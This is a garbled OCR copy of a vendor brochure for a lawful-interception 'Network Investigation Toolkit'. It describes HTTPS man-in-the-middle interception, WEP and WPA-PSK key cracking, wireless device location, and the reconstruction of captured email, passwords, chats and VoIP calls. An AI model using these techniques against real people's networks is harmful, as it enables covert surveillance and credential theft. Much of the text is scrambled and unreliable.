on SSL secured connections, so please don't complain if you see these warnings. Your communication to isohunt.com and 
torrentbox.com are fully secure when browsing under https://. 


+ tv DE Ü 1 8. 2008-07-02 02:35:03 D http://www dlink.com/prod Also, there's a poll attached to this announcement, PLEASE give us your feedback regarding whether you'll be using SSL or 
P not. 
| T TELNET (44) i9: 2008-07-02 02:34:58 4 http-//www.dlink.com/prod Reference: Stress testing experiment with redirecting all traffic to SSL (our servers handled it fine and SS did some optimizations to handle 
Q, SEARCH 20. 2008-07-02 02:34:48 (4 http://www.dlink.com/prod ("e 


(20) Comments 


E ALERT iK« 12345 TI Count: 9. 
íi EXPORT 


Firefox 3 released! 


Posted by SecretSquirrel on Jun. 17 
bi > RAMANMIACE  — 


« | " | + 


@ Internet | Protected Mode: Off @ + &100% - 


Search a 
https://192.168.10.60/http/http_reconstruct.php# @ Internet | Protected Mode: Off fg v @10% v 


Reconstruction — Sample HTTP — Upload/Download 


https://192.168.1.60/main.php - Windows Internet Explorer 


Ow > e https://192,168.1. 


File Edit View Favorites Tools 


Ve Se | Shttps:j7192.168.1.60/main.php Tools + " 
e HTTP (LINK) (1500) A Hard Disk Information ` - 146G / Used - 3.0G / Available - 136G / Available Oh - 9 
B.192.168.0.152 (40 o. Date-Timet Action File Name HTTP Content File Size 
8492 168.1.103 (39 : 
8492 168.1 17 (173 SE 2008-03-02 14:23:28 Download mirc631.exe http-//software-files.download.com/sd/jV-jCvRPehQ CTOKD... 60.3K 
E192 168.1237 (21 32. 2008-03-02 14:16:32 Download links.txt http://diy.stomp.com.sg/links.txt 275B 
8492 168.147 (11) 33: 2008-03-02 13:51:38 Download receiveim.mp3 http://mail.yimg.com/us.yimg.com/i/us/pim/receiveim.mp3 8.2K 
a aet 34. 2008-03-02 13:42:50 — Upload demo 3.JPG http://mail.google com/mail/?ui=1&ik=ed3bbe64f6&cmid=4& 50.0K 
192 168.157 (83) ao: 2008-03-02 13:36:22 ^ Download 0103HLW002 pdf http://www.todayonline.com/pdflive/0103HLW002_pdf 111.3K 
g @ HTTP (CONTENT) ( 36. 2008-03-02 13:36:14 Download 0103HLW pdf Mn WO zit com/ LS pdf 89.8K 
H192168.0.1522(52 37. 2008-03-02 13:35:44 Download ë Sus elek 481B 
8492 168.1.103 (44 38. 2008-03-02 13:35:34 Download 481B 
192.168.117 (93) Vos 1234 »» - Tol Submit ] 


8492 168.1237 (21 
8492 168.147 (13) 
E192 168.1.51 (369 
B192.168.1.53 (135 wem or eA 
8) * MEDISAVE 

* MEDISHIELD 
“aq HTTP (DOWNLO à * MEDIFUND 
E192 168.1.103 (38 
8492 168.1.17 (1) 
892 168.1. a7 (1 


e ELELIDEGeTS [RI My hospital bill cost me only 
m TELNET (3) 
ty EXPORT ‘OR the last 30 years, Mdm MediShield. patients to keep her company!” 
i Shanmuga Thayee (below! has not There was also no ModiShiold With heavy subsidies, the majority 
been in good health. With seven deductible as it was already paid forin of Class C bills are very affordable, with 
E E] MANAGE Z pro-existing conditions, including Mdm Shanmuga's previous the median bill size at $580. Only a 
i x ` diabetes and hypertension, her hospitalisation in the same year. minority of bills, like Mdm Shanmuga's, 
Iv: Medisave fund has baan deplotod ModiShiold deductible of $1,000 for ara high 
» REGISTER P So, when the 62-year-old was Class C ward bills is paid only once in a Even then, with Medisave and 
diagnosed with a heart problem in policy year MediShiald, most patients only need to 
Qe LOGOUT - November 2006, she refused to undergo _ pay a minimal amount out-of-pocket. 
< > 


Search 4 


Ji @ Internet * 10099 ~ 


Reconstruction — Sample HTTP — Video Streaming 


("A nttps//192.168.10.60/main php - Windows Internet Explorers 
File Edit View Favorites To 7 E P E 
— A Date/Time, Host, File Name, HTTP Content, File Size 
a. Rei ^ CATEGORY : VIDEO STREAM - 192.168.1.33 
+- YAHOO (22) ` | 
i e QQ (10) No. Date-Timet HOST | File Name HTTP Content File Size 
He UT UT (1) 1. 2008-09-22 02:14:32 youtube.com + WotLK: Possibly ab http://tw.youtube.com/watch?v=y17Zu... 1,011.3K 
+- SKYPE (3) 2. 2008-09-22 02:14:32 203.66.48.35 ^ 1HTTPVIDEO SNFANríf.. http://203.66.48.35/youtube/2/y17Zu..  1,011.3K 
3-«8'GOOGLETALK (1) 3. 2008-09-22 02:06:06 youtube.com + Gnomigh engineer u...  http;//tw youtube.com/watch?v-Go2Fq.. 695.0K 
+-|RORC (2) 4. 2008-09-22 02:06:06 203.66.48.101 http://203.66.48.101/youtube/4/Go2F 695.0K 
"SS FTP (22) 5. 2008-09-22 01:48:54 youtube.com http://tw.youtube.com/watch?v-X3 VP 2.6M 
|| & z P2P (13) 6. 2008-09-22 01:48:54 203.66.48.36 . http://203.66.48.36/youtube/1/X3 VP... 2.6M 
V ` peni (1322) T. 2008-09-22 01:46:53 youtube.com | @ https//192.168.10.60/http/player.swf?file-/datas/20... re e7N5... 24M 
gj HTTP (CONTENT) (127 8. 2008-09-22 01:46:53 203.66.48.36 (kee eler West Certificate Emor |]. P7N5... 24M 
5-439 HTTP (DOWNLOAD) (: 9. 2008-09-22 01:46:15 youtube.com —— w3i8c. 9846K 
s.) HTTP (RECONSTRUCI | 10. 2008-09-22 01:46:15 203.66.48.100 38. — 9846K 
5M EO STREAM =| 11. 2008-09-22 01:45:37 youtube.com 1eg09 1.5M 
8.492 168.1.9 (6) 12. 2008-09-22 01:45:37 203.66.48.41 909. 1.5M 
aM ei 13. 2008-09-22 01:45:14 ^ youtube.com d2C .  1258K 
"epp 14. 2008-09-22 01:45:14 203.66.48.68 2C 1258K 
+ —— 15. 2008-09-22 01:44:52 youtube.com b4Xo5.. 865.4K 
@, SEARCH 16. 2008-09-22 01:44:52 203.66.48.67 X05... 865.4K 
| @ ALERT 17. 2008-09-22 01:44:15 ^ youtube.com d2C .. 1258K 
ij EXPORT 18. 2008-09-22 01:44:15 203.66.43.68 eons [m |" l2c |. 125.8K 
5-49 MANAGE 19. 2008-09-22 01:43:37 youtube.com || @ Internet | Protected Mode: Off av 100% - Mear — 9704K 
|| -*$ REGISTER 20. 2008-09-22 01:43:37 — 203.66.48.38 + HTTPVIDEO YLhncHf.. http//203.66.48.38/youtube/2/E3StF.. ` 970.4K 
e — - «12 »» Count: 22, Total : 2 ,In page 1|Rows per page: 20 [ Submit] 
4 " h 
| Search a Play back reconstructed FLV video file 
@ Internet | Protected Mode: Off a e Q10% e 


Reconstruction — VoIP SIP/H.323 RTP Voice Calls 


A QQ (0) 


e SKYPE (0) 
—S'GOOGLETALK (0) 
-TRüRc (0) 

H- FTP (6) 

H- gË pp (1) 


— NAME (0) 

H- HTTP (LINK) (41) 

z gé HTTP (CONTENT) (36) 
gl HTTP (DOWNLOAD) (11 
H- à) HTTP (RECONSTRUCT) 
& SVIDEO STREAM (1) 


SD INCOMPLETE (1747) 
VOIP (6) 

—Q SEARCH 

e ALERT 
"fy EXPORT 


H-4 MANAGE 


^ CATEGORY : VOIP 


NO. Date-Time 


1 2009-12-13 
12:01:55 
2 2009-12-13 
12:01:55 
3. | 2009-12-13 
12:01:55 
4. 2009-12-13 
12:01:55 
5 2009-12-13 
12:01:55 
6 2009-12-13 
12:01:55 


n 


Caller 


&8610044407 
&8610044407 
28610044420 
28610044420 
28610044420 


28610044420 


lI] Windows Media Player _ 


Callee 


8610000104 
8610000104 
8610044421 
8610044421 
8610044421 


8610044421 


Now Playing 


Mode 


peer to peer 
peer to peer 
peer to peer 
peer to peer 
peer to peer 


peer to peer 


Type 
SIP 


SIP 
SIP 
SIP 
SIP 


SIP 


Codec 
G723 


G723 


iLBC 


G729 


File Name 


+ VOIP_9eA5je wav 
+ MÉI DNSNJw.wav 
VOIP_kljWaP. wav 
+ VOIP_GAWJF7 wav 
+ VOIP_BGu6dq.wav 


+ VOIP_6Sa3TI.wav 


, 8610044420 8610044421 


»»wvo!|m cie 1 ER 0 — 


Time 
8 Sec 
8 Sec 
58 Sec 
50 Sec 
1 Min 3 Sec 


1 Min 2 Sec 


Reconstruction — Sample Incomplete Sessions 


L Aao ^ CATEGORY : INCOMPLETE - 192.168.0.100 
"yr UT) Wo E BSSID Source Destination File Sire Type Comment 
; i a SKYPE (0) Lost 
S GOOGLETALK (0) 4. 2007-10-13 00-41:95:55-FG:F1 192.168.0.100:3115 222.139.143 73:80 INCOMPLETE Bitnpu dat 3.0K HTTP HTTP 
ao 07:39:19 
| [RoiIRc (0) Header 
eq FTP (6) 2007-10-13 SÉ 
H- dron (1) — 2. "Qaa 00:11:95:55:F6:F1 192168 0400-3492 60.28.26.251:80 INCOMPLETE_1wuXqJ det 5.7K HTTP HTTP 
2-28 An. os 
SC HTTP (LINK) (41) F poen 00:11:95:55-F6:F1 192.168.0.100:2494 202.157.142.198:80 INGPMPLETE_OinOkD dat 84K HITP HTTP 
z e HTTP (CONTENT) (: 34 Haie 
2 ag HTTP (DOWNLOAC 2007-10-13 Lost 
2 HTTP (RECONSTRI | ^ "oe 00:11:95:55:F6:F1 192.168.0.100:2416 222.13999573:80 INCOMPLETE_NXrudP dat 61B HTTP HTTP 
& VIDEO STREAM (1) [ EJ INCOMPLETE OinOkDIl dat - WordPad — 7 
"E TELNET (0) Ë 2007-10-13 g0:11:95:55:F6:F1 192.168.0.1 Ee it er fomai Hep 

[ Del 44 a e, D 

File Download 


GD INCOMPLETE (174: 


18192 168.0.100 (12 


Eer /images/FX30MBX.jpg HTTP/1.1 
Accept: */* 
Referer: http://www.ed-system.sg/ 


mm 


8192 168.1.11 (173: 


Do you want to open or save this file? 


Name: INCOMPLETE OinOkD.dat 


Accept-Language: en-us 
UA-CPU: x86 


8192 168.178 (2) 
"A VOIP (0) 


Type: Application, 8.41KB 
From: 192.168.1.60 


fg EXPORT 
jy MANAGE 
{$ REGISTER 


9 


"en While files from the Intemet can be useful, some files can potentially 
harm your computer. If you do not trust the source, do not open or 
save this file. What's the risk? 


< n h 


2007-10-13 
07:11:13 


00:11:95:55:F6:F1 192.168.0.100:1660 203.1 


Accept-Encoding: gzip, deflate 

f-Modified-Since: Sun, 04 Feb 2007 15:20:08 GMT 

If-None-Match: "168024-6620-1cb3ba00" 

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TTlive= 
Smm .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath. 1) 

Host: www. ed-system. sg 
Connection: Keep-Alive 


GET /www. ed-system. sg/ED%20small. JPG HTTP/1. 1 
Accept: */* 

Referer: http://www. ed- system. sg/ 
Accept-Language: en-us 

UA-CPU: x86 

Accept-Encoding: gzip, deflate 
If-Modified-Since: Sat, 23 Jun 2007 18:53:14 GMT 

If-None-Match: "1680T9-al5-4abfba80" 

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; TTlive&É ÉRÉRÉ; .NET 
CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath. 1) 

Host: www.ed-system.sg 
Connection: Keep-Alive 


For Help, press F1 


Data Search — Conditions & Free Text Search 


I e https;//192.168.10.60/search/search list.php - Windows Internet Explorer lela 
Æ https://192.16810.60/search/search_list.php = 
r Search Conditions 
APPLY History 
eieiei MODULE Search 
DATE: S ~ © 
| TIME : +|: vio X- ` 
IP ALL i 
BSSID 
MAC 
Search ~v 
EMAIL: ? 
[FROM [TO ACC ABCC eSa 
SUBJECT : 
WEBMAIL TYPE : M a 
SERVER IP : 
E 
ACCOUNT : 
P2P TOOL : 
= 
P2P FILE : 
GAME NAME: & 
J) 
MSN ACCOUNT: 2 Li 
[SCREEN NAME [PARTICIPANTS 
1. - 
4 Hu h 
Done & Internet | Protected Mode: Off fa v 100% e 


Location Estimation - Wireless Equipment Locator 


Utilizes Wireless Sensors and Triangulation Calculation/Training methodology to estimate 
the location of the targeted wireless devices (AP or STA). [Plane Regression] 
1 WD as Master system + min. 3 WD as Slave systems (sensors) 


[e] Wueless Equipment Locator 
e Ede Run 


r= [11] 
New I E Ene š tar 2 Resan Log 


< Wireless Network Topology 
, 


EY] 0X O4-E7-£4:5& £2 ^. — 
9 00:OE-6E:S61E£3 ^ 

E] ORO GHB 21:28 [el us - - - - 

$^  D0G60D:8844:E7-3 Tr L| 13 LI f F3 

€ 00:0P:95-90:77:3E ua pus pu EL PL E D 
ei D0G:11:9%DA: 2513 
ei De 1%E90Ac0248 
D 
` 


ORT 77 EIERE . 
ü 9C CEA 7C 


Select the targeted Wireless 
Device to show the estimated 
the location 


Display of targeted device 
estimated location 


d 
` 
. -` 
Nt Traning pro e completed 


Allow finding of approximate location of targeted wireless device in X-Y plane. 
Estimation error depending on surrounding environment (ex: blockage etc.). Normally a few meters. 


E 


Integrated Wireline & Wi-Fi/WLAN 
Real-Time Interception & 
Reconstruction System 
Network Investigation Toolkit (NIT) 


2 | Only for Government & LEA users! 


What is the capabilities of NIT? 


+ 
Ze 


Intercepts Ethernet LAN traffic through 
mirror-SPAN port (or by using a 
network tap). 

Intercepts WLAN traffic (up to 4 
different WLAN channels). 


Intercepts Ethernet LAN based 
HTTPS/SSL traffic by MITM attack. 
Intercepts WLAN based HTTPS/SSL 
traffic by MITM attack. 

Real-time raw data decoding and 
reconstruction. 

Offline raw data manual decoding and 
reconstruction. 

Forensics analysis and evidence 
preservation investigation. 


Introduction to Network Investigation Toolkit 


USB 
3.5G/HSDPA 
Adapter 


UD 
LS i 
P 
y — P 
W 
< 
USBHub < 


Lenovo ThinkPad X200 


USB WIFI Adapters 


Solution for: 

Lawful Enforcement Agencies (Police 
Intelligence, Military Intelligence, 
National Security, Counter Terrorism, 
Cyber Security, Defense Ministry, 
Secret Services etc. 


NIT Implementation Mode - LAN Interception 


NIT System 

INTERNET Mode of Operation: 

Ethernet LAN Passive Interception 
Passive 

servers Mode 


Router/Firewall 


Capture - 5niffer Mode 
Sniffer technology is used for capturing Internet 
traffic/packets through port-mirroring switch. 


irror 


SERVER FARM 


NIT System 
Manage by Investigator 


Another building /department/floor 


NIT Implementation Mode — LAN HTTPS Interception 


SSLSERVERS 


Network Investigation Toolkit (NIT) 
INTERNET LAN HTTPS/SSL MITM Intercept 


Active 
Mode 


Router/Firewall SERVERS 


Manage 
Administrator 


SERVER FARM 
SWITCH/HUB 


Tr  — 


MITM Attack 
By: 

1. Connect to LAN Internet 

2. Connect to WLAN Internet 


f 3. Connect to 3G Internet 
Targeted Users Pool 


NIT Implementation Mode — WLAN Interception 


Passive NIT System | CO 
Mode Mode of Operation: INTERNET j 
WLAN Passive Interception 


= = = — = = =a w en we 
= 
wel my 


<. 
Kä 
INCUN tM Wireless, STA 
a |. — — < — € 
"2 - beet "d - : % 
Ba Wireless STA Wireless STA as 
á kl 

,* POM ` 
Bi ms, (duh 
I k 1 k. L] 
k 1 ` / ` | 
i ` Á # I 

LU W * I 

` ÑW F 

i 1 r] 

N ' AP CH6 d 

` d Ke 
`< i > - = 
sf ` * 
^ wl 
Cracking of: 
WEP Key 


WPA -PSK Key (Optional) 
NIT System (WLAN Interception) 


Intercept up to 4 concurrent channels 


NIT Implementation Mode — WLAN HTTPS Interception 


NIT | 
WLAN HTTPS/SSL MITM INTERNET 
Interception f 


Active Mode 


Wireless STA 


Y: 
1. Connect back to AP 
2. Connect to LAN Internet 


~ » Ww 3. Connect to3.5G Internet 
— M 
Hz | 
L. — , -" 
AMEN. «——— — — — 


Wireless STA 


NIT (WLAN HTTPS/SSL MITM 
Interception) — System acts as an 
AP for the targeted user 


Cracking/Decryption of WEP/WPA Key 


WEP Key Cracking/Decryption can be done by NIT System! | 


1. WEP Key Cracking/Decryption:-- (64, 128, 256 bit key) 
Active Crack — By utilizing ARP packet injection (possibly about 5- 10r mins.) 
64-bit key — 10 HEX 

128-bit key — 26 HEX 


2. WPA-PSK Key Cracking/Decryption:-- (Optional Module Available) 
WPA-PSK cracking is an optional module. By using external server with 
Smart Password List and GPU Acceleration Technology. 

This helps and increases the chance of WPA-PSK cracking for LEA. 
Countermeasure: Intercept at the ISP or Human Intelligence 


Notes: 
The time taken to decrypt the WEP key by passive mode depends on amount network activity. 
The time to crack WPA-PSK key depends on the length and complexity of the key. Besides, it is 
compulsory to have the WPA-PSK handshakes packets captured for a chance to crack the key. 


WPA-PSK Password Recovery 


4i Elcomsoft Wireless Security Auditor [F ac PN 
File Action Options Help 


& SS RB N "n au @ @ 


Import + Create Open ~ Save Start Pause Check for Help 
data project project project attack attack updates contents 


Elcomsoft Wireless Security Auditor 


o Congratulations! The password has been found. 


Time stamp Message 


10:27:18 April 09, 2011 About to start new recovery: 2 CPU cores, 0 h/w accelerators 
10:27:18 April 09, 2011 Starting performance monitor 

10:27:19 April 09, 2011 Performance monitor started successfully 

10:27:19 April 09, 2011 Recovery: started 

10:27:19 April 09, 2011 Recovery: the password has been found :) 

10:27:20 April 09, 2011 Recovery: stopped 


Is is an optional feature! Additional system is required! 
Please contact Decision Group for more information. 


NIT — Homepage - Status of Operation 


| ` ` http//192.168.1....n/frame/frame.php | + ` É 


f HOME | © CASE RESULTS | % SYSTEM SETTINGS | B SYSTEM STATUS IS REGISTRATION] 


GUI Refresh in 24 Second(s) 
Operation Mode : Ethernet LAN Mirror-Sniffer Capture Mode 

Case Name : default 

Case Name Import ID : ED-2010-01-04 17:39:19 
Created By : admin 
Created Date : 2009-12-01 23:09:35 

Database ID : EDE 1 

Raw Data File(s) Reserving Directory : /home/admin/cases/default/ 


Services and Ports Information : gel 


Operation Mode Status : Running Stop | 


The side has Has Has WCS Lose Dro Drop TCP TCP UDP UDP 
Interface captured the captured captured Packet P Packet Packet Packet 
š : Packets 5 Packets š Packets ° Packets š 
time Packets Packet Size Size Size Size Size 
ethÜ 6064 888653 255456 KB 0 0 KB 0 0 KB 163366 Seen 724398 sss 


Display the current operation mode and status of implementation 


NIT — Case Results Presentation/Visualization 


| http://192.168.1....n/frame/frame.php | + = 


e HOME | CASE RESULTS | 3 SYSTEM SETTINGS | B SYSTEM STATUS | [$ REGISTRATION | 


N 


Raw Data Set ID 


MAC * POP3 IMAP SMTP e 
00:50:7F:29:58:11 0 0 0 0 6 0 0 0 0 
00:24:21:A1:92:7F 43 0 0 5 0 1 0 0 0 0 0 0 O 255 231 
00:1A:80:5C:5B:DE 7 0 2 1 1 0 0 2 0 0 0 0 0 128 128 


2 
Wal b h Enter Page| | Go | 


fi} HOME | (£j CASE RESULTS | G SYSTEM SETTINGS | & SYSTEM STATUS | [# REGISTRATION 


Total 3 Total Page 1 Current Page 1 


[D 


2 default | «gp 00:24:21:A1:92:7F | Webmail(Read) 


[3 Webmail Read) | Webmail Token Analyzer Record/Pa [ 20 [Confirm | 

No. @ Date-Time Account Sender Receiver CC Subject Webmail Type 

44 2010-01-04 18:15:34 192.168.1.11 wedetective2@hotmail... wedetective2 Smart CCTV YAHOO2.0 Mail 

42 2010-01-04 18:14:53 1924168441  wedetective1@yahoo.c... wedetective2... Airshow YAHOO2.0 Mail 

41 2010-01-04 18:14:53 192.168.1.11 wedetective1@yahoo.c... wedetective2 Google YAHOO2.0 Mail 

40 2010-01-04 18:14:53 192.168.1.11  wedetective1(gyahoo.c... wedetective2 Sing in the house YAHOO2 0 Mail D 
39 2010-01-04 18:14:48 192.168.1.11 wedetective1@yahoo.c... wedetective2... wedetectiv... Re: ai! ga g jl! YAHOO2.0 Mail Top-Down VIeW O n 
38 2010-01-04 18:14:48 192.168.1.11 wedetective1@yahoo.c... wedetective2... wedetectiv... This is the case YAHOO2.0 Mail 

37 2010-01-04 18:14:48 1492468441  wedetective1@yahoo.c... wedetective2 wedetectiv... AA ga Si YAHOO2.0 Mail Ca se Resu Its G U I š 
36 2010-01-04 18:14:46 192.168.1.11 wedetective2@hotmail... wedetective2... frankie@ed... Test Email YAHOO2.0 Mail 

35 2010-01-04 18:14:45 192.168.1.11 decision@ed-system s... wedetective1... wedetectiv... FW: AA ga g jill YAHOO2.0 Mail 

34 2010-01-04 18:14:45 192.168.1.11 decision@ed-system.s... wedetective2 wedetectiv... |j. article YAHOO2 0 Mail 

33 2010-01-04 18:14:45 192.168.1.11 decision@ed-system.s... decision@ed-.. wedetectiv... terrorist YAHOO2.0 Mail 

32 2010-01-04 18:14:42 192.168.1.11 decision@ed-system.s... decision@ed- wedetectiv... wow wow world YAHOO2.0 Mail 

31 2010-01-04 18:14:42 192.168.1.11 wedetective2@hotmail... decision@ed- frankie@ed... Robinho arrested over alleged sexu YAHOO2.0 Mail 

30 2010-01-04 18:14:42 192.168.1.11 juventus_ita@yahoo.c... wedetective2... frankie@ed... Mew Choo left out of All-England s ... — YAHOO2.0 Mail 

29 2010-01-04 18:14:36 192.168.1.11 wedetective2 hotmail... wedetective1... wedetectiv... 2010 Vancouver Olympics costing YAHOO2.0 Mail 

28 2010-01-04 18:14:36 192.168.1.11 internet-forensics@e... wedetective1 wedetectiv... Ronaldo gives Man United 1-0 win YAHOO2.0 Mail 

27 2010-01-04 18:14:36 192.168.1.11 wedetective1@yahoo.c... wedetective2... support@ed... Test 1 YAHOO2.0 Mail 

26 2010-01-04 18:14:29 192.168.1.11 — wedetective1(gyahoo.c... wedetective2... Test Email YAHOO2 0 Mail 

25 2010-01-04 18:14:29 192.168.1.11 twitter-invite-wedet wedetective2 Frankie Chan wants to keep up wit YAHOO2.0 Mail 

24 2010-01-04 18:14:29 192.168.1.11 frankie(Qed-system.sg frankie(g digi frankie@ed... Test Email..... YAHOO2.0 Mail 


Sample: Email (POP3, SMTP, IMAP) 


fi} HOME | © CASE RESULTS | % SYSTEM SETTINGS | B SYSTEM STATUS | E? REGISTRATION | 


BB default | e 00:24:21:A1:92:7F |POP3 


No. O Date-Time Account Sender Receiver cc Subject E Account password 
EI) oce 192.168.1.11 frankie(gdigi-forensi... Rad dE sg wedetectiv... Brazil nuclear plants m ... frankie(2« frank 
17. rri 192.168.1.11 wedetective2@hotmail... ... E mohamed.di... RE: New Raw Data Fi ... frederick decision2 
16. EE 192.168.1.11 wedetective2@hotmail..... 2 abuelkroush@..  ""ehamed.di.. RE: New Raw Data Fi... frederické  decision2 
14. d oa 192.168.1.11 wedetective2@hotmail..... SES mohamed.di RE: New Raw Data Fi ... frederick& decision2 
13. O ym 192.168.1.11 wedetective2(ghotmail... ` P —— mohamed.di.. RE: New Raw Data Fi ... frederick& decision2 
12. piste 192.168.1.11 Mailer-Daemon(lion.s Budae Ed Mail delivery failed: ret ... frankie@e — frank 
11. d T 192.168.1.11 wedetective2@yahoo.c... RP wedetectiv... Fw: Robinho arrested o ... frankie(2« frank 
10. pores 192.168.1.11 wedetective1(Qyahoo.c... EE EE Singapore Flyers frankie@< frank 
9. Tast. 1192468441 wedetective2Qhotmai.. Sai SEET Guardiola warns Ibrah .. frankie@e frank 
8 Ü ET 192.168.1.11 wedetective2@hotmail... CA — ds knocks out MU f. frankie@c frank 
T ii) f ger MU from FA Cup, wins for Arsenal and Chelsea - Chinese Simplified (GB2312) ` Se) Novo rastreador satelit frankie@e frank 
File Edit View Tools Message Help 
MOMMY Reply WE Reply All MR Forward MO t S| EB I RE: ED system frankie@¢ frank 


| From: i d 
E Decision Computer <wedetective2@hotmail. com>; ë e 
5. | Date: — Monday, 4 January, 2010 10:00 AM Just a reminder, you ar ... frankie@e frank I 
M«1» To: frankieüdigi-forensics. com <franki e@digi-forensics. com>; W. aire LM 


| Subject: ü Cup. wins for Arsenal and Chelsea 


Attach: Z computex2009-1.jpg (106 KB) 


LONDON: Manchester United suffered their most embarrassing FA Cup defeat for 26 years when Leeds 
United pulled off a stunning 1-0 third-round victory at Old Trafford yesterday. 

A 19th-minte goal from in-form striker Jermaine Beckford gave the Third Division leaders victory as United, 
who have won the Cup a record 11 times, went out at this stage for the first time since 1984. 

Holders Chelsea made sure there was no slip-up at Stamford Bridge where they crushed Second Division 
Watford 5-0 after streaking into a 3-0 lead in 22 minutes. 

Daniel Sturridge, John Eustace (own goal) and Florent Malouda settled the outcome with early goals 

|| before Sturridge and Frank Lampard scored in the second half to ensure Chelsea eliminated Watford for 
the second season running. 

Arsenal also avoided an early exit by coming from behind to win 2-1 against West Ham at Upton Park. 
Alessandro Diamanti gave the home team the lead at the end of the first half. The Gunners fought back to 
equalise through Aaron Ramsey in the 78th minute. Eduardo then came to the rescue with the winning 
aoal in the R3rd minute 


Sample: Webmail (Read and Sent) 


, | http://192.168.1....n/frame/frame.php 


A HOME | CASE RESULTS | Ë SYSTEM SETTINGS | B SYSTEM STATUS | E REGISTRATION 


A2 default | > 00:1A:80:5C:5B:DE | Webmail (Sent) | 


_ [© Webmail (Sent) Record/Page | 50 [ Confirm | 
No. Ú) Date-Time Account Sender PassWord Receiver BCC Subject ree 
2010-01-04 B Let lindows Liv 
5 (i) 17:55:25 192.168.1.10 wedetective2 (hotmail I frankie@digi ge Windows Live 
ee ee uus aid. frankie@ed-s.. Guardiola warns Ibrahimov .. Windows Live 


“41 »meEnterPage[ | Go ] 


Total 2 Total Page 1 Current Page 1 


(B) Mozilla Firefox III 


(| http://192.168.1.12:888/general/common/decode/mail/openweb.php? TYPE-3& PARENT ID-5&mime, val- &R 


FROM ` wedetective2 (hotmail com 
DATE / TIME: 2010-01-04 17:5525 
TO: frankie@digi-forensics.com 


ins for Arsenal and Chelsea 


LONDON: Manchester United suffered their most embarrassing FA Cup defeat for 26 years when 
Leeds United pulled off a stunning 1-0 third-round victory at Old Trafford yesterday. 


A 19th-minte goal from in-form striker Jermaine Beckford gave the Third Division leaders victory 
as United, who have won the Cup a record 11 times, went out at this stage for the first time since 
1984. 


Holders Chelsea made sure there was no slip-up at Stamford Bridge where they crushed Second 
Division Watford 5-0 after streaking into a 3-0 lead in 22 minutes. 


Daniel Sturridge. John Eustace (own goal) and Florent Malouda settled the outcome with early 
goals before Sturridge and Frank Lampard scored in the second half to ensure Chelsea eliminated 
Watford for the second season running. 


Arsenal also avoided an early exit by coming from behind to win 2-1 against West Ham at Upton 
Park. 


Alessandro Diamanti gave the home team the lead at the end of the first half. The Gunners fought 
back to equalise through Aaron Ramsey in the 78th minute. Eduardo then came to the rescue with 


the xinnina coal in the 23rd mite 


Done Fiddler: Disabled 


Webmail Type: Yahoo Mail, HTTP Gmail, 
Windows Live Hotmail, Giga Mail and 
others 


Sample: Instant Messaging (Yahoo, MSN etc.) 


| | | bttpy/192.168.1....n/frame/frame.php | + | E 


fi} HOME | IP CASE RESULTS | Ë SYSTEM SETTINGS | B) SYSTEM STATUS | E REGISTRATION | 


m default | g$” 00:24:21:A1:92:7F | YAHOO 


.Y3 YAHOO | “Download Tool Record/Page : | 50 [ Confirm | 


No. dj Date-Time Account User Handle Participants Conversation Count 


2. () 2010-01-04 18:41:05 192.168.1.11 wedetective2 wedetective1 Conversation: 13 


Wal »» Enter Page | Total Total Page 1 Current Page 1 
@ Mozilla Firefox 


i| | http://192.168.1,12:888/general/common/decode/yahoo/yahoo_msg.php?_PARENT_ID=2&CATEGORY=YAHOO&RunAs=&mime_val= w 
X5 pate-Time : 2010-01-04 18:41:05 | User Handle : wedetective2 Record/Page : | 50 [ Confirm | | 
. Date-Time User Handle Type Message Time started Finish Time 

s Cerat wedetective1 Message hello... 

" 41: 
D š 
H 
Yahoo: Includes file UL ` weg Messe torri 


wedetective2 Message hi i am fine 


transfer, webcam, voice E. eum 


18:41:20 wedetective2 Message yeyayaya 


call (GIPS Decoder E 


2010-01-04 


Required) _ 


MSN: Includes file ws 


18:42:28 


transfer, webcam — 


wedetective2 


wedetective1 Message thanks 


: l 2010-01-04 2010-01-04 
estate? Keen © 18:43:10 18:43:49 
wedetective1 Message great 


3 : 2010-01-04 2010-01-04 
stade EE e 19:28:02 19:28:57 


wa! » m Enter Page Total 13 Total Page 1 Current Page 1 


Fiddler: Disabled | 


Sample: HTTP Link and HTTP Content 


A HOME | (£j CASE RESULTS | G SYSTEM SETTINGS | ËB SYSTEM STATUS | Z REGISTRATION 


m default | e 00:1A:80:5C:5B:DE | HTTP Content 


@ HTTP Content Record/Page : [ 50 [ Confirm | 
No. Date-Time Account Content = 
397. 2010-01-04 21-10-48 192 168.1.10 E] I TeleStrategies ISS World Asia Pacific - Intelligent Support Systems for Lawful Interception 

Criminal Investigations and Intelligence Gathering 
396. 2010-01-04 21:09:40 192 168.1 10 [ f TeleStrategies ISS World Asia Pacific - Intelligent Support Systems for Lawful Interception 
Criminal Investigations and Intelligence Gathering 
395. 2010-01-04 21-09-30 192 468.1.10 E] : TeleStrategies ISS World MEA Dubai - Intelligent Support Systems for Lawful Interception 
Criminal Investigations and Intelligence Gathering 
394. 2010-01-04 21:09:11 192 168 1.10 Ë] TeleStrategies - The leading producer of telecommunications industry conferences, seminars, 
tutorials and trade shows. 
393. 2010-01-04 21:08:54 192.168.1.10 [3 TeleStrategies' ISS World 
392. 2010-01-04 21:08:50 192.168.1.10 H ISS lawful interception - Google Search 
391. 2010-01-04 21:08:41 192.168.1.10 [I Google 
390. 2010-01-04 21:00:49 192.168.1.10 EJ AddThis utility frame 
Tawa nterapton - Googe SAE 
389. 2010-01-04 21:00:49 192.168.1.10 u sro fI 
388. 2010-01-04 20:58:17 192 168.1.10 H ST701 Web Images Maps News Books Wanslate Gmail more v Web History | Search settings | Signin “| 
387. 2010-01-04 20:58:17 192.168.1.10 FJ AddThis|| ^" Kee [ Search | asaras sen 
Search: € the web © pages from Singapore 
386. 2010-01-04 20:57:47 192.168.1.10 H AddThis || — 1. = —— — 
Web Show options. Results 1 - 10 of about 4,980 for ISS lawful interception. (0.23 seconds) E 
385. 2010-01-04 20:57:45 192.168.1.10 H ST701 EE Spuet | Sponsored Links 
www Glimmerglass com Optical Signal Distribution for LI. Any Signal Rate, Format, Wavelength —— 
384. 2010-01-04 20:56:29 192.168.1.10 PJ ST701 Network and Security Tools to help you work with LI data 
| www amesysfr "Lawful and IP interception” Software security _.. No obligation, free trial. 
